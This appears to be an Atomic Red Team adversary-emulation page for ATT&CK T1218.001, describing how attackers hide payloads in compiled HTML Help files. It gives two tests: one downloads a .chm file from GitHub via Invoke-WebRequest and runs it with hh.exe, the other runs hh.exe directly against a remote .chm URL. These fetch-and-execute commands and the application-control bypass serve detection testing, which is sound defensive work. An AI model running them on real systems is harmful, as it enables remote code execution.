Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)A custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)
Uses hh.exe to execute a local compiled HTML Help payload. Upon execution calc.exe will open
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| local_chm_file | Local .chm payload | path | PathToAtomicsFolder\T1218.001\src\T1218.001.chm |
hh.exe #{local_chm_file}if (Test-Path #{local_chm_file}) {exit 0} else {exit 1} New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm" -OutFile "#{local_chm_file}"Uses hh.exe to execute a remote compiled HTML Help payload. Upon execution displays an error saying the file cannot be open
Supported Platforms: Windows
| Name | Description | Type | Default Value |
|---|---|---|---|
| remote_chm_file | Remote .chm payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm |
hh.exe #{remote_chm_file}